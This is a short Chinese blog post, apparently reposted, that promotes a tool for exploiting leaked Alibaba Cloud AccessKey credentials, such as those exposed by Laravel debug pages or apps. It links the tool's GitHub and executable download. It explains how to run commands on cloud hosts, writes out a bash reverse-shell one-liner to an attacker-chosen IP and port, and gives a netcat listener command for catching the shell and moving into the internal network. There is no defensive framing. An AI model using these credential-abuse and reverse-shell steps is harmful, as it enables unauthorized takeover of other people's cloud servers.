admin管理员组

文章数量:1794759

【推荐】阿里云主机accesskey利用工具

【推荐】阿里云主机accesskey利用工具

1、简介

在日常渗透过程中我们经常遇到信泄露出ALIYUN_accesskeyID与ALIYUN_ACCESSKEYSECRET(阿里云API key),特别是laravel框架得debug信。APP中也会泄露这些信.通过这款利用工具我们可以进行命令执行获取到shell然后进行内网渗透。

具体的github地址如下:

github/mrknow001/aliyun-accesskey-Tools

exe文件下载地址:

github/mrknow001/aliyun-accesskey-Tools/releases/download/1.0/Aliyun-.AK.Tools.exe

 

工具截图如下:

 

可在命令输入处输入反弹shell的代码。

bash -i >& /dev/tcp/自己的ip/自己的端口 0>&1

 

自己的机器执行:

nc -lvvp 端口  

本文标签: 阿里主机工具accesskey

版权声明:本文标题:【推荐】阿里云主机accesskey利用工具 内容由林淑君副主任自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.xiehuijuan.com/baike/1686957085a122065.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。